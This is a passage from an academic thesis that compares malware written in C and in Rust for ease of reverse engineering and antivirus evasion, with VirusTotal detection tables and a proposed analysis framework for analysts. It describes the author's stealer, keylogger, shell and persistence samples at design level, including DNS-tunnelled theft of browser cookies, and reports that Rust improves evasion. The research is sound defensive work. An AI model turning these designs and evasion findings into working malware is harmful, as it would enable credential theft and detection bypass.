Hosts file exfiltration using DNS T1020 Automated Exfiltration.
T1027 Obfuscated Files or Information.
T1071.004 Application Layer Protocol: DNS.
Edge browser history exfiltration using DNS T1020 Automated Exfiltration.
T1027 Obfuscated Files or Information.
T1071.004 Application Layer Protocol: DNS.
Edge browser cookies exfiltration using DNS T1020 Automated Exfiltration.
T1027 Obfuscated Files or Information.

17
T1071.004 Application Layer Protocol: DNS.
Delete registry key T1112 Modify Registry.
Modify registry key T1112 Modify Registry.
Add registry key T1112 Modify Registry.
T1547.001 Boot or Logon Autostart Execution: Registry Run
Keys.
Simple keylogger T1056.001 Input Capture: Keylogging.
Keylogger that sends file with data via DNS T1056.001 Input Capture: Keylogging.
T1020 Automated Exfiltration.
T1027 Obfuscated Files or Information.
T1071.004 Application Layer Protocol: DNS.
Keylogger that sends file with data via email T1056.001 Input Capture: Keylogging.
T1114 Email Collection.
T1020 Automated Exfiltration.

1. File manipulator: This category of malware creates, modifies or deletes files on a


victim's computer system to disrupt normal operations or cover up the attackers’
tracks [82], [83], [84]. The types of malware developed in this category are:

i. Create File: A malware that creates files in a specified directory.

ii. Delete File: A malware that deletes all the files in a specified directory.

iii. Encrypt File: A malware that encrypts all the files in a specified directory.

iv. Modify File: A malware that modifies the entries in the “C:\Windows\System32\
Drivers\etc\hosts” file.

2. Command shells: This category of malware allows attackers to control the victim's
machine and execute commands on it. A reverse shell is a type of malware that
provides attackers with remote access to a victim's computer system [85]. A bind shell
is a type of malware that starts a listener on a victim's computer system to accept
connections from the attackers [86]. The types of malware developed in this category
are:

i. A simple reverse shell: A malware that connects to the attacker and starts
“cmd.exe”.

18
ii. A simple bind shell: A malware that opens a listener for an attacker to connect and
start “cmd.exe”.

iii. An obfuscated reverse shell: A reverse shell which uses XOR encryption to
obfuscate strings in its source code.

iv. An obfuscated bind shell: A bind shell which uses XOR encryption to obfuscate
strings in its source code.

3. Information stealer: This category of malware is designed to steal sensitive


information from a victim's computer system. This can include passwords, financial
data, and sensitive files [87], [88], [89]. The types of malware developed in this
category are:

i. Hosts file exfiltration using email: A malware that sends the “C:\Windows\
System32\Drivers\etc\hosts” file as a mail attachment to the attacker.

ii. Edge browser history exfiltration using email: A malware that sends the
“%LOCALAPPDATA%\Microsoft Edge\User Data\Default\History” file as a mail
attachment to the attacker.

iii. Edge browser cookies exfiltration using email: A malware that sends the
“%LOCALAPPDATA%\Microsoft Edge\User Data\Default\Cookies” file as a
mail attachment to the attacker.

4. Covert information stealer: This category of malware is similar to information


stealers. However, they avoid detection by using techniques like encryption, encoding
and disguising as legitimate network traffic to avoid detection [90], [91], [92]. The
types of malware developed in this category are:

i. Hosts file exfiltration using DNS lookup: A sophisticated malware that base64
encodes the contents of the “C:\Windows\System32\Drivers\etc\hosts” file in
chunks of 5 bytes, and performs an nslookup of this encoded string to a rogue
DNS server. The rogue DNS server upon receiving this lookup request, can put
together the base64 decoded strings to get the contents of the file.

19
ii. Edge browser history exfiltration using DNS lookup: A sophisticated malware
that base64 encodes the contents of the “%LOCALAPPDATA%\Microsoft Edge\
User Data\Default\History” file in chunks of 5 bytes, and performs an nslookup of
this encoded string to a rogue DNS server. The rogue DNS server upon receiving
this lookup request, can put together the base64 decoded strings to get the contents
of the file.

iii. Edge browser cookies exfiltration using DNS lookup: A sophisticated malware
that base64 encodes the contents of the “%LOCALAPPDATA%\Microsoft Edge\
User Data\Default\Cookies” file in chunks of 5 bytes, and performs an nslookup
of this encoded string to a rogue DNS server. The rogue DNS server upon
receiving this lookup request, can put together the base64 decoded strings to get
the contents of the file.

5. Registry manipulator: This category of malware modifies, deletes or adds Windows


registry keys for persistence, evasion or disruption of activities [93], [94], [95]. The
types of malware developed in this category are:

i. Add registry key: This malware adds itself to the “HKEY_CURRENT_USER\


Software\Microsoft\Windows\CurrentVersion\Run” registry as a persistence
mechanism so that it runs automatically at every reboot.

ii. Modify registry key: This malware modifies the default value of the autorun
registry entry of the OneDrive program “HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Run\OneDrive” to an invalid value of 0. This
prevents OneDrive from automatically running at every reboot.

iii. Delete registry key: This malware deletes the default autorun registry entry of the
OneDrive program “HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run\OneDrive”. This also prevents OneDrive from automatically
running at every reboot.

20
6. Keylogger: This category of malware records every keystroke on a computer. This is
done to collect sensitive information like passwords, credit card numbers, and other
personal data [96], [97], [98]. The types of malware developed in this category are:

i. A simple keylogger: This malware records all the keystrokes and logs it to the
“C:\Users\Public\key.log” file.

ii. A keylogger that sends the log file using email: This malware records all the
keystrokes and logs it to “C:\Users\Public\keyem.log” and then sends this log file
to the attacker as an email attachment.

iii. A keylogger that sends the log file using DNS lookup: This malware records all
the keystrokes and logs it to “C:\Users\Public\keydns.log”. It then base64 encodes
its contents in chunks of 5 bytes, and performs an nslookup of this encoded string
to a rogue DNS server. The rogue DNS server upon receiving this lookup request,
can put together the base64 decoded strings to get the contents of the file.

4.1.2 Program Developed for Code Analysis

In addition to the 40 samples of malware developed above, an access-checking program was


developed to test Ghidra and IDA Free’s ability to decompile and disassemble binaries
written in the Rust programming language respectively.

As shown in Figure 3, the access-checking program was developed in such a way that it has
function calls, function return values, conditional checks based on return values and nested
conditional checks. This was done to establish a baseline when testing the ease of analyzing
different control flows using Ghidra and IDA Free.

21
Figure 3. Control flow of the code analyzed program.

22
4.2 Experiment 1: Comparing the Ease of Malware Analysis and Reverse
Engineering
Manual and automated static and dynamic analysis are performed on the 40 samples
developed. Manual analysis was performed using the tools from the REMnux toolkit [99] ,
and automated analysis was performed using VirusTotal [100], [101].

The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge)


Techniques and Tactics mapped to the behavior of the malware by Virus Total were of
particular interest in this experiment. For each sample tested, VirusTotal conducts dynamic
analysis in one of its sandboxes and provides a list of ATT&CK Techniques and Tactics,
along with a severity rating for each of these mappings which are: “unknown”, “info”, “low”,
“medium” and “high” [102].

Since the behavior of the developed samples is already known, we analyzed the list of
MITRE ATT&CK Tools and Tactics listed by VirusTotal to identify False Positives (FP) and
False Negatives (FN). Five metrics were collected and compared during the manual and
automated static and dynamic analysis. In this thesis, we have interpreted the relationship
between these metrics and the ease of analysis and reverse engineering in the following way:

1. Size of the binaries: The size of the malware binary is considered inversely
proportional to the ease of analysis. This is because, in general, it was observed that
the speed with which a binary can be disassembled, decompiled and analyzed
decreases with the increase in its size.

2. Strings that can be used to identify the source-language and the author: The number of
identifiable strings in the malware binary is considered directly proportional to the
ease of analysis. This is because, the more identifiable strings are found, the more is
the ease with which the source-language and information about the threat actor can be
identified.

3. The number of “non-info” MITRE ATT&CK Techniques and Tactics identified in


Virus Total: The number of “non-info” findings, i.e., “unknown” and “info” findings,
are considered inversely proportional to the ease of analysis. This is because these

23
findings do not provide a clear and definite information about the intent and key
behaviors of the malware.

4. The percentage of False Positives (FP) MITRE ATT&CK Techniques and Tactics
identified in Virus Total: The FP% is considered inversely proportional to the ease of
analysis of the malware. This is because, the more the FP% is, the more the number of
records an analyst has to manually retest, making the analysis process less easy. The
FP% is calculated as shown below [103]:
FP % = (FP / Total) * 100 (1)

5. The percentage of False Negative (FN) MITRE ATT&CK Techniques and Tactics
identified in Virus Total: The FN% is considered inversely proportional to the ease of
analysis of the malware. This is because, the more the FN%, the more the number of
records an analyst has to manually retest to discover malicious behavior that went
unreported. This makes the analysis process less easy, and FNs are more dangerous
than FPs [104]. The FN% is calculated as shown below:
FN % = (FN / Total) * 100 (2)

The access-checking program written in the C and Rust programming language were
analyzed in Ghidra and IDA Free to collect and compare the following metrics:

1. Ease of identifying the main function from the decompiled/disassembled output.

2. Ease of identifying other program functions from the decompiled/disassembled


output.

3. Ease of understanding program flow from the decompiled/disassembled output.

Table 5. summarizes the cause-effect design of experiment 1.

Table 5. The cause-effect design of Experiment 1.

Variable Type Variable


Independent (Cause) Compiler/Programming language
Dependent (Effect) Ease of analysis and reverse engineering

24
4.3 Experiment 2: Comparing the Effectiveness of Antivirus Evasion
VirusTotal is a free service owned by Google to inspect files and URLs for malware [100]. As
of 2023, a given sample is tested using 70 antivirus vendors known as Contributors [101].
The 40 samples of the malware developed in the C and Rust programming languages are
submitted for analysis to VirusTotal. In this thesis, we have assigned weights to the results of
VirusTotal to calculate the percentage of antivirus evasion. These weights are determined as
follows:

1. Undetected: Results labeled as “Undetected” are considered benign, i.e., not


malware. To measure antivirus evasion, these results are given a weight of 1.

2. Malware: Results labeled as “malicious”, “malware”, “trojan”, and other similar


labels that indicate moderate to high confidence are considered as malware. To
measure antivirus evasion, these results are given a weight of 0.

3. Grayware: Results labeled as “grayware” or “low confidence” are considered as


software that may or may not be malware. To measure antivirus evasion, these
results are given a weight of 0.5.

Based on this interpretation, we calculate the percentage of malware evasion as follows:


Evasion% = ( ((Undetected *1) + (Malware*0) + (Grayware*0.5)) /70 ) * 100
=> Evasion% = ( (Undetected+ (Grayware*0.5)) /70 ) * 100 (3)
Where 1, 0 and 0.5 are the respective weights of the results; and 70 is the total number of
antivirus results.

The percentage of evasion of the samples written in C and the Rust programming language
are compared to determine which samples have better evasion. Table 6. summarizes the
cause-effect design of experiment 2.

Table 6. The cause-effect design of Experiment 2.

Variable Type Variable


Independent (Cause) Compiler/Programming language
Dependent (Effect) Effectiveness of antivirus evasion (evasion%)

25
5 Results
This chapter presents the raw data collected, the calculations used, and the observations of the
experiments conducted. These results and observations are then discussed in further detail in
the next chapter.

5.1 Results of Experiment 1


This section presents the results of Experiment 1 which compares the ease of analysis and
reverse engineering malware written in the C and Rust programming languages. It evaluates
the hypothesis H1 and answers the research questions R1 and R2.

5.1.1 Size of the Binaries

During static analysis of the 40 malware samples, the size of their binaries were collected.
Table 7 provides a comparison of the size of the binaries, in KiloBytes, of the malware
samples written in the C and Rust programming languages.

Table 7. Comparison of the size of malware binaries.

Sub-category Size of the Binary (in KB)


of Malware
C Programming Language Rust Programming
Language
Delete files 118.89 1022.5
Encrypt files 119.23 1023
Create files 118.95 1020
Modify file 45.3 1021.5
Simple reverse shell 83.50 1000
Simple bind shell 110 269.50
Obfuscated reverse shell 84 259.50
Obfuscated bind shell 110 272
Hosts file exfiltration using email 127 1770
Edge browser history exfiltration using email 127 1770
Edge browser cookies exfiltration using email 127 1770
Hosts file exfiltration using DNS 46.28 1020
Edge browser history exfiltration using DNS 46.78 1020
Edge browser cookies exfiltration using DNS 46.78 1020
Delete registry key 45.49 1010

26
Modify registry key 45.49 1010
Add registry key 45.5 1023
Simple keylogger 119.5 259.50
Keylogger that sends file with data via DNS 129.5 350.50
Keylogger that sends file with data via email 131.50 785.50

It is observed that the binaries of all malware written in the Rust programming language are
significantly greater in size than their C counterparts. This indicates that analysis,
disassembly and decompilation of malware written in the Rust programming language is
more difficult and time-consuming.

5.1.2 Identifiable String Patterns in the Binaries

The GNU strings utility was used to collect string patterns that could be used to identify the
source language and other details about the malware and its author. Table 8 lists the common
string patterns that were observed when analyzing the malware samples in the C and Rust
programming language.

Table 8. List of identifiable strings in the binary.

Language Strings
Source Language Info Other Info
C Programming MinGW specific strings: • Source name is exposed when compiled
Language • Mingw with GCC/MinGW.
• GCC • Email ids and SMTP server’s name for
• libgcc.c email-based stealer malware.
• RogueDNS’ name for covert stealer
MSVC specific strings: malware.
• WS2_32.dll
Rust Programming • .rs references • Some binaries exposed the author’s home
Language • cargo directory: C:\Users\m\.cargo.
• rustc • Email ids and SMTP server’s name for
• rust_panic email-based stealer malware.
• RogueDNS’ name for covert stealer
malware.

It is observed that it was easier to find identifiable strings within malware written in the Rust
programming language than their C counterparts. The string patterns in the C binaries varied
depending on the compiler used, i.e. MinGW or MSVC. Moreover, the Rust binaries exposed
the home directory of the system in which it was compiled, as shown in Figure 4. Such an

27
exposure could potentially reveal the identity of a careless attacker. This indicates that
identifying information about a malware using string analysis is easier for those written in the
Rust programming language those written using the C programming language.

Figure 4. Exposed home directory in the embedded strings of the malware written in the Rust
programming language.

5.1.3 False Positive and False Negative MITRE ATT&CK findings

The number of False Positives (FP) and False Negatives (FN) MITRE ATT&CK findings in
VirusTotal for the malware samples were calculated using Equations 1 and 2 described in
Section 4.2. The raw data for this calculation is provided in Table 9 for malware in the C
programming language, and Table 10 for malware in the Rust programming language. The
final results of comparison are provided in Table 11.

Table 9. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the C programming
language.
C Programming Language Non- False Positives False Negatives
Total Info
Sub-category of Malware Info FP % FN % TT
Delete files 9 9 0 4 44.44 0 0
Encrypt files 9 9 0 4 44.44 0 0
Create files 7 7 0 2 28.57 0 0
Modify file 6 5 1 1 20 0 0
Simple reverse shell 5 5 0 3 60 0 0
Simple bind shell 9 8 1 7 87.5 0 0
Obfuscated reverse shell 8 8 0 5 62.5 0 0
Obfuscated bind shell 8 8 0 5 62.5 0 0
Hosts file exfiltration using email 7 7 0 0 0 0 0
Edge browser history exfiltration
7 7 0 0 0 0 0
using email
Edge browser cookies exfiltration
7 7 0 0 0 0 0
using email
Hosts file exfiltration using DNS 11 10 1 1 10 0 0
Edge browser history exfiltration
10 9 1 1 11.11 0 0
using DNS
Edge browser cookies exfiltration
12 11 1 1 9.09 0 0
using DNS
Delete registry key 7 7 0 3 42.85 0 0
Modify registry key 12 10 2 4 40 0 0

28
Add registry key 8 8 0 1 12.5 0 0
Simple keylogger 15 15 0 6 40 0 0
Keylogger that sends file with T1056*,
16 16 0 7 43.75 2 12.5
data via DNS T1016**
Keylogger that sends file with
15 15 0 6 40 1 6.66 T1056*
data via email
Cumulative Total → 7 32.96 0.95
*T1056: Input Capture - Creates a DirectInput object (often for capturing keystrokes).
**T1016: System Network Configuration Discovery - Uses nslookup.exe to query domains.

Table 10. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the Rust
programming language.
Rust Programming Language Non- False Positives False Negatives
Total Info
Sub-category of Malware Info # % # % TT
Delete files 18 18 0 11 61.1 0 0
Encrypt files 18 18 0 11 61.1 0 0
Create files 19 19 0 11 57.89 0 0
Modify file 20 18 2 10 55.55 0 0
Simple reverse shell 20 20 0 13 65 0 0
Simple bind shell 11 11 0 8 72.72 0 0
Obfuscated reverse shell 12 12 0 8 66.66 0 0
Obfuscated bind shell 11 11 0 7 63.63 0 0
Hosts file exfiltration using email 33 33 0 20 60.60 0 0
Edge browser history exfiltration
33 33 0 20 60.60 0 0
using email
Edge browser cookies exfiltration
33 33 0 20 60.60 0 0
using email
Hosts file exfiltration using DNS 22 22 0 12 54.54 0 0
Edge browser history exfiltration
22 22 0 12 54.54 0 0
using DNS
Edge browser cookies exfiltration
22 22 0 12 54.54 0 0
using DNS
Delete registry key 23 23 0 11 47.82 0 0
Modify registry key 26 24 2 11 45.83 0 0
Add registry key 22 22 0 11 50 0 0
Simple keylogger 15 15 0 8 53.33 1 6.66 T1056*
Keylogger that sends file with T1056*,
18 18 0 11 61.11 2 11.11
data via DNS T1016**
Keylogger that sends file with
22 22 0 12 54.54 1 4.54 T1056*
data via email
Cumulative Total → 4 58.09 1.11
*T1056: Input Capture - Creates a DirectInput object (often for capturing keystrokes).
**T1016: System Network Configuration Discovery - Uses nslookup.exe to query domains.

29
Table 11. Results of comparison of the FP% and FN% of malware written in the C and Rust
programming languages.

Results of Comparison Number of “non- False Positive % False Negative %


info” findings
C Programming Language 7 32.96 0.95
Rust Programming 4 58.09 1.11
Language

As observed in Table 11, the number of “non-info” MITRE ATT&CK findings is lesser for
malware written in the Rust programming language than their C counterparts. Among the
“info” MITRE ATT&CK findings, malware written in the Rust programming language had
more False Positives than their C counterparts. The same trend was observed for the False
Negatives. This indicates that the results of automated dynamic analysis of malware written
in the Rust programming language is less useful for analysts because they have to retest the
malware manually.

5.1.4 Reverse Engineering using Ghidra

Reverse engineering the access-checking program written in the C programming language


was simple. A symbol tree is a representation of the binary's internal structure showing how
functions, variables, and other program elements are connected. As shown in Figure 5, the
symbol tree of the C program was clearly displayed in Ghidra.

Figure 5. Symbol tree of the program written in the C programming language in Ghidra.

30
The “main” function and the “is_valid” function were decompiled in an understandable
format as shown in Figures 6 and 7.

Calling is_valid() from main().

Figure 6. Decompiled “main” function of the program written in the C programming language in
Ghidra.

Checking if the string length = 10

Checking if the 5th character is ‘@’

Figure 7. Decompiled "is_valid" function of the program written in the C programming language in
Ghidra.

31
However, reverse engineering the access-checking program written in the Rust programming
language was difficult. The function names were not displayed in the symbol tree. Hence, the
Search Program Text feature had to be used to search for “Access Denied” string as shown in
Figure 8 to identify the namespace in the program that could lead to the main function.

Figure 8. Searching for the "Access Denied" text in the program written in the Rust programming
language in Ghidra.

It is observed that the function names are mangled. As shown in Figure 9, the “main”
function was in the FUN_00108b30 namespace.

Namespace with the “main”


function.

Figure 9. Decompiled "main" function of the program written in the Rust programming language in
Ghidra.

32
Although the function was decompiled, it was difficult to understand because it was
decompiled in the format of a C program. Moreover, the decompiled “main” function had
additional checks that were not part of the original source code as shown in Figure 10.

Additional code found, which was not


part of the original source code.

Figure 10. Additional code observed in the program written in the Rust programming language in
Ghidra.

It is also observed that the contents of the “main” contained the checks from the “is_valid”
function which indicates that the two functions are merged in the FUN_00108b30 namespace
as shown in Figure 11. The reason for this is discussed in Chapter 6.

Conditional check from “is_valid” within “main”

Figure 11. Combined code found in the decompiled program written in the Rust programming language
in Ghidra.

33
5.1.5 Reverse Engineering using IDAFree

It is observed that IDAFree was able to disassemble the C programming language and a flow
graph was generated as shown in Figures 12 and 13. However, IDAFree did not properly
disassemble the Rust programming language and did not generate a flow graph as shown in
Figure 14.

Calling “is_valid” from


“main”.

Figure 12. Disassembled flow of the "main" function of the program written in the C programming
language in IDA Free.

Checking if the string length = 10

Checking if 5th
character is ‘@’.

Figure 13. Disassembled flow of the "is_valid" function of the program written in the C programming
language in IDA Free.

34
Figure 14. Disassembled flow of the program written in the Rust programming language in IDA Free.

5.1.6 Summary of Results of Experiment 1

To summarize, results evaluate the first hypothesis H1 to be true. Answering the research
questions RQ1 and RQ2, malware written in the Rust programming language are more
difficult to analyze and reverse engineer than those written in C due to the following factors:

1. Size of the binaries of malware written in the Rust programming language are
significantly larger than those written in the C programming language.

2. The number of False Positives (FP) produced by an automated analysis tool is greater
for malware written in the Rust programming language.

3. The number of False Negatives (FN) produced by an automated analysis tool is


greater for malware written in the Rust programming language.

35
4. IDA Free fails to disassemble and generate a flow graph for the malware binary
written in the Rust programming language.

5. Although Ghidra decompiles the malware binary written in the Rust programming
language, it does it in the format of a C program. Moreover, the disassembled code
contains additional checks added by the rustc compiler for optimization, and all the
function names are mangled by the rustc compiler. This makes the disassembled code
difficult to interpret even though it is in a high-level language format.

5.2 Results of Experiment 2


This section presents the results of Experiment 2 which compares the effectiveness of
evading antivirus detection by malware written in the C and Rust programming languages. It
evaluates the hypothesis H2 and answers the research questions R1 and R2.

The raw data containing the detection rates of each sample on VirusTotal is provided in Table
12 and Table 13 for malware written in the C and Rust programming languages respectively.
Equation 3 described in Section 4.3 was used to calculate the antivirus evasion percentage
using this raw data.

Table 12. Calculation of the evasion% of malware written in the C programming language.
Sub-category of Malware in the Undetected Malware Grayware
Evasion %
C Programming Language (1) (0) (0.5)
Delete files 69 1 0 98.57
Encrypt files 69 1 0 98.57
Create files 69 1 0 98.57
Modify file 54 15 1 77.85
Simple reverse shell 35 35 0 50
Simple bind shell 58 12 0 82.857
Obfuscated reverse shell 35 35 0 50
Obfuscated bind shell 56 14 0 80
Hosts file exfiltration using email 55 15 0 78.57
Edge browser history exfiltration using
55 15 0 78.571
email
Edge browser cookies exfiltration using
55 15 0 78.571
email
Hosts file exfiltration using DNS 64 6 0 91.42
Edge browser history exfiltration using
63 7 0 90
DNS
Edge browser cookies exfiltration using
63 7 0 90
DNS
Delete registry key 58 12 0 82.85

36
Modify registry key 57 13 0 81.42
Add registry key 58 12 0 82.85
Simple keylogger 67 3 0 95.71
Keylogger that sends file with data via
66 4 0 94.28
DNS
Keylogger that sends file with data via
64 6 0 91.42
email

Table 13. Calculation of the evasion% of malware written in the Rust programming language.
Sub-category of Malware in the Undetected Malware Grayware
Evasion %
Rust Programming Language (1) (0) (0.5)
Delete files 69 1 0 98.57
Encrypt files 68 1 1 97.85
Create files 68 1 1 97.85
Modify file 68 1 1 97.85
Simple reverse shell 68 1 1 97.85
Simple bind shell 70 0 0 100
Obfuscated reverse shell 69 1 0 98.57
Obfuscated bind shell 70 0 0 100
Hosts file exfiltration using email 70 0 0 100
Edge browser history exfiltration using
70 0 0 100
email
Edge browser cookies exfiltration using
70 0 0 100
email
Hosts file exfiltration using DNS 68 1 1 97.85
Edge browser history exfiltration using
67 3 0 95.71
DNS
Edge browser cookies exfiltration using
67 3 0 95.71
DNS
Delete registry key 68 2 0 97.144
Modify registry key 69 1 0 98.57
Add registry key 69 1 0 98.57
Simple keylogger 67 3 0 95.71
Keylogger that sends file with data via
69 1 0 98.57
DNS
Keylogger that sends file with data via
68 2 0 97.14
email

37
Table 14. Results of comparison of the evasion% of malware written in the C and Rust programming
languages.

Results of Comparison Count % of malware


Equal evasion 2 10
Malware in the C programming
2 10
language evades more
Malware in the Rust programming
16 80
language evades more
Average Difference in evasion % % evasion
Malware in the C programming
0.71
language evades more
Malware in the Rust programming
18.3
language evades more

As observed in Table 14, it was found that 80% of the malware written in the Rust
programming language evaded antivirus detection more than their C counterparts, with an
average difference of 18.3% in the evasion. Only 10% of the malware written in the C and the
Rust programming language showed equal antivirus evasion. Similarly, only 10% of the
malware written in the C evaded more than those written in the Rust programming language.

5.2.1 Summary of Results of Experiment 2

To summarize, results evaluate the second hypothesis H2 to be true. Extending the previous
answer to the research questions RQ1 and RQ2, malware written in the Rust programming
language evades antivirus tools significantly better than those written in C.

38
6 Discussion
This chapter presents detailed analysis of the results presented in Chapter 5, to discuss their
meaning and implications.

6.1 Larger Binary Size of the Malware Written in the Rust Programming
Language
This section discusses three factors that were found to be contributing to the larger binary size
of malware written in the Rust programming language.

6.1.1 Standard and Runtime Libraries

The standard library [105] of the Rust programming language is a collection of functionality
for common operations such as input/output, threading, networking, data structures, and error
handling. The standard library is designed to provide a consistent API for programs written in
the Rust programming language regardless of the underlying operating system, thus allowing
for cross-compilation.

The Rust programming language’s runtime library [106], is a collection of multiple libraries
that provide low-level support for things like thread creation [107], synchronization [108],
and system calls [109]. This enables programs written in the Rust programming language to
achieve high performance and low memory usage, while still providing access to essential
platform-specific functionality.

A large portion of the standard and runtime libraries are bundled into the binary during
compilation by the rustc compiler. This makes the binaries of malware written in the Rust
programming language larger than their C counterparts [110]. The increased size is a tradeoff
for the Rust programming language's safety, memory management, and performance features.

6.1.2 Default Dependency Linkage

Cargo, the Rust programming language’s package manager, by default statically links the
crates, which are external library dependencies [110], [111]. Due to this, all the code for the
external dependencies are bundled with the binary along with the standard and runtime

39
libraries during compilation. The increased size is a tradeoff for the ease of deployment and
distribution of binaries by statically linking external dependencies.

6.1.3 Inlining and Loop Unrolling for Optimization

The rustc compiler uses an optimization technique called inlining to improve performance.
Inlining [112], [113] is the process of replacing a function call with the actual code of the
function. This eliminates the overhead of the function call and improves performance.
However, it also increases the size of the binary because the code for the function will be
duplicated in multiple places. An example of this is observed in Figure 11 in Section 5.1.4,
where the function call to “is_valid” has been replaced by its code in the “main” function.

Another optimization technique used by the rustc compiler is loop unrolling. Loop unrolling
[114], [115] involves duplicating the body of a loop in the source code to reduce the overhead
of loop control instructions. This also results in a binary containing multiple copies of the
loop body, thus increasing its size. The rustc compiler provides several optimization levels
[116], ranging from “-O0” for no optimization to “-O3” for aggressive optimization. The “--
release” mode of compilation uses “-O3” level of optimization. As the optimization level
increases, the compiler may generate more code which could increase the binary size.

6.2. More Identifiable Strings in the Malware Written in the Rust


Programming Language
Binary stripping is the process of removing debug symbols and unnecessary information
about the binary or the developer environment [117]. It was observed that despite stripping
the binary and compiling it in “--release” [118] mode, the binary contained strings that
expose the home directory of the system in which the program was compiled. This has been
raised as a privacy concern by several members of the open-source community on GitHub
[119], however, a proper fix has not been deployed.

There are several workarounds proposed to prevent this, such as remapping the home
directory to a random string using “--remap-path-prefix{home_directory}=
{random_identifier}” [120]. However, this is also not a foolproof solution as discussed by the
author of the OffensiveRust [121] project on GitHub. From an attacker’s perspective, this can

40
expose more details about them. From a defender’s perspective, such an exposure could
reveal more information that could help the malware analysis process.

6.3 Limitations of Existing Reverse Engineering Tools


This section discusses the two main limitations of Ghidra and IDA Free in handling the
intricacies of the rustc compiler when reverse engineering binaries written in the Rust
programming language.

6.3.1 Name Mangling

Mangling [122] is a name decoration scheme used by the rustc compiler to uniquely identify
functions and other symbols in the resulting binary file. This scheme encodes information
about a symbol's name, arguments, return type, and other attributes into a mangled string,
which is used as the symbol's actual name in the binary file. It is necessary to prevent naming
conflicts and enable the linker to correctly link symbols between different object files [123].

In Ghidra, the symbol tree is displayed on the left side in a “Symbol Tree” window [124]. In
IDA , it is displayed in the “Names” window [125]. When reverse engineering, analyzing the
symbol tree can help identify key functions and variables. As shown in Figure 5 in Section
5.1.4, the symbol tree of the C program was used to quickly navigate to the main function.
However, this was not possible for the program written in the Rust programming language
because tools like Ghidra and IDA could not de-mangle the symbols or work around it to
recreate the symbol tree.

6.3.2 Additional Code Added for Exception Handling

In Rust, exception handling is implemented using the “panic” mechanism, which is a form of
unwinding the stack in response to a runtime error [126], [127], [128]. When the Rust
compiler detects a potential panic condition, it generates additional code in the binary to
perform runtime checks and ensure that the panic is handled correctly.

As noticed in Figure 10 in Section 5.1.4, the rustc compiler generated additional code in the
binary to handle the “InvalidInstructionException”. Since this code is not part of the original
source, it increases the complexity of analyzing the decompiled or disassembled binary. In
addition to the exception handling code, the rustc compiler may also generate additional code

41
to check for null pointers, validating input data types, or enforcing bounds checks. It is also
worth noting that the code added by the compiler for optimization as explained in Section
6.1.3. also contribute to the complexity of analysis.

6.4 Limitations of Existing Detection Systems


Signature-based detection compares the signature of a file with a database of known malware
signatures [129]. Although this method is effective against known malware, it can not detect
new or modified malware which are not in the database [130]. This allows attackers to create
new variants of existing malware or rewrite existing malware in a new programming
language to avoid detection by antivirus systems.

Code obfuscation is a technique used by malware authors to alter the code or code-flow of the
malware to evade detection [131], [132]. As explained in Sections 6.3.2 and 6.1.3, the
additional code added for optimization and exception handling by the Rust programming
language makes it difficult to understand the purpose and exact behavior of the binary.
Furthermore, when obfuscation using XOR encoding was explicitly applied on the command
shells during testing, results showed that the obfuscated command shells further evaded
detection. Hence, this feature of the Rust programming language offers a great advantage to
malware authors as it makes code obfuscation simpler.

Packing is another technique used by malware authors which involves compressing the
malware's code to evade detection [133], [134]. The malware written in the Rust
programming language exhibits characteristics of a packed binary when it is compiled in the
“--release” mode and stripped. This is another advantage for malware authors as it allows the
malware written in the Rust programming language evade detection better than their C
counterparts.

The signature-based testing is usually followed up with a behavior-based detection using


dynamic analysis [135], [136]. When it comes to behavior-based detection of malware
written in the Rust programming language, results show that the above-mentioned features
led to a large number of false positives. Except for the obfuscated shells, all other malware
written in the Rust programming language for experimentation were not explicitly packed or
obfuscated. However, all results of the behavior-based detection by VirusTotal had a MITRE

42
ATT&CK finding of “T1027 Obfuscated Files or Information” [137] or “T1562.001 Creates
guard pages, often used to prevent reverse engineering and debugging” [138]. Despite these
MITRE ATT&CK findings, results also show that none of the sandboxes used for automated
dynamic analysis in VirusTotal reported them as malicious. This indicates that current
antivirus systems have limitations that make them ineffective against not just new malware,
but also existing malware that have been rewritten in a different programming language.

43
7 Recommended Analysis Framework
As an effort to answer the third research question RQ3, an analysis framework with 4 phases
is proposed. A comparison between the proposed framework and the traditional malware
analysis framework which is currently being used in most research [26], [139], [140] is
illustrated in Figure 15.

Figure 15. The recommended malware analysis framework.

The recommended analysis framework offers several advantages over the traditional
framework. Most importantly, it is more effective for identifying and analyzing malware
written in the Rust programming language. One of its strengths is its ability to quickly
identify the source language used to write the malware in the first phase itself, through string
analysis. This is critical because the analyst can plan ahead and select the appropriate tools

44
for the following phases of the analysis based on the source language used by the malware.
Additionally, the framework prioritizes saving time during dynamic analysis through a hybrid
approach. This is essential for efficient and thorough of analysis unknown malware. Most
importantly, the framework suggests open-source tools and extensions that can be used for
easier reverse engineering of malware written in the Rust programming language. Such a
framework was requested in 2019 in Ghidra’s GitHub issues [141].

7.1 Phase 1: Static Analysis


During malware analysis, several identifiers should be collected to help identify and classify
the malware. The file name may provide clues about the purpose and behavior of the
malware. The file size, creation date, and modification date are useful in determining the
timeline of the attack.

Other important identifiers include the file type and the target operating system. In particular,
it is important to look for embedded strings that are associated with the Rust programming
language as shown in Table 8 in Section 5.1.2. As discussed earlier, embedded strings within
the malware written using the Rust programming language could reveal information about the
malware author.

Metadata such as file permissions and ownership within the target system can provide
insights regarding the malware's capabilities and potential impact on the system. Finally, the
MD5, SHA-1, and SHA-256 hash values should be collected for the Phase 2 of analysis,
which is signature-based detection.

7.2 Phase 2: Signature-based detection


It is essential to first rule out if the file being analyzed is a known malware. This can be done
using signature-based detection tools.

If the signature is the same as a known malware, further analysis is not required. However, if
the signature is different and the detection tool flags it as similar, or if it is undetected, then
further investigation is required.

45
7.3 Phase 3: Hybrid Dynamic Analysis Approach
As seen in the results of this thesis, most of the malware written in the Rust programming
language evade signature-based detection. Due to this reason, it is important to focus on
dynamic analysis of a malware for which identifiers of the Rust programming language were
found in Phase 1.

The results of this thesis also showed that automated dynamic analysis for behavior-based
detection mechanisms are likely to generate more False Positives (FPs) and False Negatives
(FNs) for malware written in the Rust programming language. For this reason, a hybrid
approach for dynamic analysis is proposed in this framework. Hybrid malware analysis
leverages the strengths of manual and automated approach to provide a more comprehensive
and accurate assessment of a malware sample [33].

When the analyst finds identifiers indicating that the malware is written in the Rust
programming language, it is recommended to start with manual dynamic analysis while the
